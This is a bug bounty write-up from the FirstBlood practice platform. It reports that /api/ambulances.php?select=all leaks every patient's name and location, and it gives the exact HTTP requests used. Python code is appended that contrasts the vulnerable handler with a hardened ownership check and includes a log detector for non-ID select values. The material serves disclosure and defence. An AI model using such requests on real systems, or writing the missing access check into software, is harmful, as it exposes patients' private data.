FirstBlood-#1192[Collab] Unauthorized Access to Patients' PII at /api/ambulances.php
This issue was discovered on FirstBlood v3



On 2022-12-08, buraaq Level 2 reported:

Collaborators:

Collab: isitbug
Collab: eliee

Hello zseano,

Summary

API endpoint /api/ambulances.php?select= is used to query the details of patient and ambulance using appointmentId. All of the appointments' information is exposed if we query it using the all string rather than an ID.

Steps to Reproduce:

  1. Since the appointment form does not offer an ambulance service, we manually add the parameter ambulance=1 in order to assign one to ourselves.

Request:

POST /api/ba.php HTTP/1.1
Host: d9b20d5057cc-buraaq.a.firstbloodhackers.com
Content-Length: 145
Content-Type: application/x-www-form-urlencoded
Anti-Csrf: 123
User-Agent: Mozilla/5.0
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

fname=buraaq&lname=sec&address=123&city=456&phonenumber=9876543211&[email protected]&dob=1-1-1900&a1=1&a2=2&a3=3&message=hello&ambulance=1&slot=2

Example Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Dec 2022 20:09:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44

success|36ddc575-0fda-4107-9661-e53b77172e87

  2. Now visit https://d9b20d5057cc-buraaq.a.firstbloodhackers.com/api/ambulances.php?select=all and you should get all users' details.

Request:

GET /api/ambulances.php?select=all HTTP/1.1
Host: d9b20d5057cc-buraaq.a.firstbloodhackers.com
User-Agent: Mozilla/5.0
Connection: close

Example Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Dec 2022 20:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1219

{
 "id": "99215d4e-0ff3-4275-aede-b3168428ec0a",
 "name": "John Smith",
 "location": "1 Quay Point, Station Road, Woodbridge, IP12 4AL",
 "ambulance": [
     {
       "appointment_assigned": "99215d4e-0ff3-4275-aede-b3168428ec0a",
       "ambId": "2022536203",
       "status": "attending"
     },
   ]
},

.....
.....
.....
.....

Impact

An attacker gains unauthorised access to any user's sensitive PII (name, location, etc.).

P2 High

Endpoint: /api/ambulances.php

Parameter: select

Payload: all


FirstBlood ID: 71
Vulnerability Type: Information leak/disclosure

The endpoint /api/ambulances.php leaks patient information if the parameter ?select=all is supplied

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were the first to discover this bug and you have been rewarded a $200 bounty (split between 3). We've rounded it up to $67 per collaborator (as bounties are split evenly amongst collaborators)
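The following is an added example written for this write-up; it is not FirstBlood's code and it is not code from the report or its collaborators. It models the reported behaviour of an ambulances.php-style lookup in Python: first the vulnerable shape (a magic `all` value returns every appointment, with no ownership check), then a hardened handler that takes the user from the session, only accepts a single well-formed appointment id, and returns a record only when the session user owns it. It also includes a small access-log check that flags `select` values which are not a single id, which is the kind of signal a defender could alert on. All appointment data, user names and log lines below are constructed; the helper names are hypothetical.

```python
"""Added example: vulnerable vs hardened 'select' handling, plus a log check."""
import re

# Constructed sample store: appointment id -> record (all values invented).
APPOINTMENTS = {
    "11111111-1111-4111-8111-111111111111": {
        "owner": "alice",
        "name": "A. Example",
        "location": "1 Example Street",
        "ambulance": [{"ambId": "1000000001", "status": "attending"}],
    },
    "22222222-2222-4222-8222-222222222222": {
        "owner": "bob",
        "name": "B. Example",
        "location": "2 Example Road",
        "ambulance": [],
    },
}

# A single lowercase RFC 4122-style UUID, nothing else.
UUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$"
)


def vulnerable_select(select: str) -> list:
    """Shape the report describes: 'all' dumps every record, no ownership check."""
    if select == "all":
        return list(APPOINTMENTS.values())
    rec = APPOINTMENTS.get(select)
    return [rec] if rec else []


class BadRequest(Exception):
    """select was not a single well-formed appointment id."""


def hardened_select(session_user: str, select: str):
    """Hardened handler (hypothetical).

    - session_user comes from the authenticated session, never from the request.
    - select must match exactly one appointment id; 'all' or any list form is
      rejected before any lookup happens.
    - A record is returned only if session_user owns it. Missing and not-owned
      both yield None so the endpoint does not confirm which ids exist.
    - The 'owner' field is stripped so the response carries only what the
      patient needs to see.
    """
    if not UUID_RE.match(select):
        raise BadRequest("select must be a single appointment id")
    rec = APPOINTMENTS.get(select)
    if rec is None or rec["owner"] != session_user:
        return None
    return {k: v for k, v in rec.items() if k != "owner"}


# Constructed access-log lines in combined-log style; not from the report.
LOG_LINES = [
    '10.0.0.5 - - [08/Dec/2022:20:13:16 +0000] "GET /api/ambulances.php?select=all HTTP/1.1" 200 1219',
    '10.0.0.6 - - [08/Dec/2022:20:14:01 +0000] "GET /api/ambulances.php?select=11111111-1111-4111-8111-111111111111 HTTP/1.1" 200 310',
    '10.0.0.7 - - [08/Dec/2022:20:15:22 +0000] "GET /api/ambulances.php?select=* HTTP/1.1" 200 1219',
]

SELECT_RE = re.compile(r'"GET /api/ambulances\.php\?select=([^ &"]*)')


def flag_non_id_selects(lines) -> list:
    """Return (client_ip, raw_select) for requests whose select is not one UUID.

    Any value other than a single appointment id (e.g. 'all', '*') is a
    request the endpoint should never have served; a 200 with a large body on
    such a line is worth an alert.
    """
    hits = []
    for line in lines:
        m = SELECT_RE.search(line)
        if m and not UUID_RE.match(m.group(1)):
            hits.append((line.split()[0], m.group(1)))
    return hits


if __name__ == "__main__":
    print("vulnerable 'all' returns", len(vulnerable_select("all")), "records")
    print("hardened alice own:", hardened_select("alice", "11111111-1111-4111-8111-111111111111"))
    print("hardened bob on alice's id:", hardened_select("bob", "11111111-1111-4111-8111-111111111111"))
    print("flagged:", flag_non_id_selects(LOG_LINES))
```

The hardened handler deliberately returns the same `None` for "does not exist" and "exists but is not yours"; returning 403 only for the second case would let a caller enumerate valid appointment ids. The log check is intentionally simple: the authorisation fix is the real control, and the check is there so that a regression or a similar endpoint shows up in monitoring.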